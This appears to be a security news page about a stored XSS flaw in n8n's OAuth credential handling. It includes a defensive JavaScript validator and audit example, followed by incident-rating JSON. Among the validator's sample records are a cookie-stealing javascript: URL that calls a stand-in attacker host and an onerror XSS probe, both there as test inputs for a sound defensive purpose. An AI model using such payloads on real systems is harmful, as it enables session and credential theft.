n8n: OAuth vulnerability in n8n automation platform could lead to system compromise

Stored XSS Vulnerability in n8n Automation Platform Exposes Credentials to Attackers

Researchers at Imperva have identified a stored cross-site scripting (XSS) vulnerability in n8n, a popular workflow automation platform, stemming from a misconfiguration in OAuth credential handling. The flaw, patched in n8n v2.6.4 released on February 6, could allow attackers to inject malicious JavaScript payloads into the platform’s database, compromising credentials and potentially gaining control of connected systems.

How the Vulnerability Works

n8n lets organizations automate workflows by integrating with services such as Google Workspace, Microsoft 365, Slack and GitHub, authenticating to them with OAuth tokens or API keys. The platform did not properly sanitize the authorization URL of an OAuth credential, so an attacker with access to the instance could replace a legitimate URL with a script payload. Because that value is persisted in the database, the payload executes in the browser of any other user who later interacts with the tampered credential, enabling credential exfiltration and, through the tokens n8n holds, compromise of the connected systems.
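The root cause described above is an untrusted URL that is stored and later rendered. The JavaScript below is an added example written for this page, not n8n's own code, and shows the two layers a practitioner would expect: an allowlist validator applied before an authorization URL is stored (https only, no embedded credentials, no control or whitespace characters) and HTML escaping wherever the stored value reaches the UI. The field name authUrl, the record shape and the sample values are constructed assumptions; the page does not show the n8n schema or the exact payload. It also goes one step beyond the article by running the same validator as an audit over already-stored records, since a patch stops new bad values from being saved but does not retroactively inspect old ones.

```javascript
// Added example (not n8n's code): allowlist validation of an OAuth
// authorization URL before it is stored, plus HTML-escaping at render time,
// so a tampered credential cannot carry script into the web UI.
// The field name `authUrl` and the sample records below are constructed for
// this illustration; the real n8n schema is not shown on the page.

// Only https:// authorization endpoints are acceptable for OAuth 2.0
// (RFC 6749 requires TLS for the authorization endpoint). Anything else -
// javascript:, data:, plain http:, or a value that is not a URL at all -
// is rejected with a reason the caller can log.
function validateAuthorizationUrl(raw) {
  if (typeof raw !== 'string' || raw.length === 0 || raw.length > 2048) {
    return { ok: false, reason: 'empty, non-string or oversized value' };
  }
  // Control characters or whitespace inside the value indicate tampering;
  // WHATWG URL parsing would otherwise silently strip some of them.
  if (/[\u0000-\u0020\u007f]/.test(raw)) {
    return { ok: false, reason: 'control or whitespace characters present' };
  }
  let parsed;
  try {
    parsed = new URL(raw); // global in Node.js and browsers
  } catch {
    return { ok: false, reason: 'not an absolute URL' };
  }
  if (parsed.protocol !== 'https:') {
    return { ok: false, reason: `scheme ${parsed.protocol} not allowed` };
  }
  if (parsed.username || parsed.password) {
    return { ok: false, reason: 'credentials embedded in URL' };
  }
  // Store the normalized serialization so what is kept is exactly what was checked.
  return { ok: true, url: parsed.href };
}

// Output encoding for any stored string that reaches an HTML context.
// This is the second layer: even if a bad value does reach the database,
// it is displayed as text rather than interpreted as markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Audit hook: run the validator over existing credential records and report
// the ones that would not pass today, with the reason for each.
function auditStoredCredentials(records) {
  return records
    .map((r) => ({ id: r.id, ...validateAuthorizationUrl(r.authUrl) }))
    .filter((r) => !r.ok)
    .map(({ id, reason }) => ({ id, reason }));
}

// Constructed sample records, not real data: three legitimate-looking
// endpoints (one over plain http) and two tampered values.
const SAMPLE_RECORDS = [
  { id: 'cred-1', authUrl: 'https://accounts.google.com/o/oauth2/v2/auth' },
  { id: 'cred-2', authUrl: 'javascript:fetch("https://attacker.example/?c="+document.cookie)' },
  { id: 'cred-3', authUrl: 'https://login.microsoftonline.com/common/oauth2/v2.0/authorize' },
  { id: 'cred-4', authUrl: 'http://github.com/login/oauth/authorize' },
  { id: 'cred-5', authUrl: '<img src=x onerror=alert(1)>' },
];

console.log(auditStoredCredentials(SAMPLE_RECORDS));
console.log(escapeHtml(SAMPLE_RECORDS[4].authUrl));
```

The validator returns the re-serialized URL rather than the raw input so that the stored value and the checked value can never diverge; the audit reuses it unchanged, which keeps the pre-save check and the post-upgrade sweep from drifting apart.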

Attack Requirements & Impact

Exploiting this flaw requires initial access to the victim’s n8n system, making it a second-stage attack rather than an entry point. However, if successful, an attacker could:

  • Steal OAuth tokens and API keys across multiple services.
  • Escalate access to connected applications, including CRMs, databases, and messaging tools.
  • Compromise entire automation workflows, amplifying the breach’s impact.

Imperva warns that automation platforms like n8n centralize risk by aggregating access to critical systems. A single vulnerability in such a platform can be more damaging than a flaw in an isolated application, as it provides a gateway to multiple services.

Previous Incidents & Growing Threat

n8n has faced security challenges before, including a separate OAuth-related vulnerability patched in January alongside four other CVEs. The platform’s rising popularity has also attracted threat actors, with reports of malicious integrations posing as legitimate n8n tools.

Organizations using n8n are advised to treat automation platforms as Tier-0 assets, enforcing strict access controls and ensuring timely patching to mitigate risks. The latest fix (v2.6.4) addresses the stored XSS flaw, but users must apply updates to prevent exploitation.

Source: https://www.csoonline.com/article/4141867/oauth-vulnerability-in-n8n-automation-platform-could-lead-to-system-compromise.html

n8n cybersecurity rating report: https://www.rankiteo.com/company/n8n

{
  "id": "N8N1772821622",
  "linkid": "n8n",
  "type": "Vulnerability",
  "date": "2/2026",
  "severity": "85",
  "impact": "4",
  "explanation": "Attack with significant impact, including customer data leaks"
}

{
  "affected_entities": [
    {
      "customers_affected": "Organizations using n8n for workflow automation",
      "industry": "Technology/Software Development",
      "name": "n8n",
      "type": "Software/Automation Platform"
    }
  ],
  "attack_vector": "Malicious JavaScript payload injection via OAuth credential handling misconfiguration",
  "data_breach": {
    "data_exfiltration": "Possible (credential theft via malicious scripts)",
    "personally_identifiable_information": "Possible (if connected services store PII)",
    "sensitivity_of_data": "High (access to connected services)",
    "type_of_data_compromised": "OAuth tokens, API keys, credentials"
  },
  "date_publicly_disclosed": "2026-02-06",
  "date_resolved": "2026-02-06",
  "description": "Researchers at Imperva identified a stored cross-site scripting (XSS) vulnerability in n8n, a popular workflow automation platform, stemming from a misconfiguration in OAuth credential handling. The flaw could allow attackers to inject malicious JavaScript payloads into the platform's database, compromising credentials and potentially gaining control of connected systems.",
  "impact": {
    "brand_reputation_impact": "Potential reputational damage due to credential compromise and system access risks",
    "data_compromised": "OAuth tokens, API keys, credentials",
    "identity_theft_risk": "High (if PII or sensitive credentials are exposed)",
    "operational_impact": "Compromise of automation workflows, potential system-wide access escalation",
    "systems_affected": "n8n automation platform, connected services (Google Workspace, Microsoft 365, Slack, GitHub, etc.)"
  },
  "investigation_status": "Patched",
  "lessons_learned": "Automation platforms centralize risk and should be treated as Tier-0 assets with strict access controls and timely patching.",
  "post_incident_analysis": {
    "corrective_actions": "Patch released in n8n v2.6.4 to sanitize authorization URLs",
    "root_causes": "Improper sanitization of authorization URLs in OAuth credential handling"
  },
  "recommendations": "Apply the n8n v2.6.4 patch, enforce strict access controls, monitor for malicious integrations, and treat automation platforms as critical assets.",
  "references": [
    { "source": "Imperva" }
  ],
  "response": {
    "containment_measures": "Patch released in n8n v2.6.4",
    "remediation_measures": "Proper sanitization of authorization URLs, patch application",
    "third_party_assistance": "Imperva (security research)"
  },
  "stakeholder_advisories": "Organizations using n8n advised to apply the patch and enforce access controls.",
  "title": "Stored XSS Vulnerability in n8n Automation Platform Exposes Credentials to Attackers",
  "type": "Stored Cross-Site Scripting (XSS)",
  "vulnerability_exploited": "Improper sanitization of authorization URLs in n8n"
}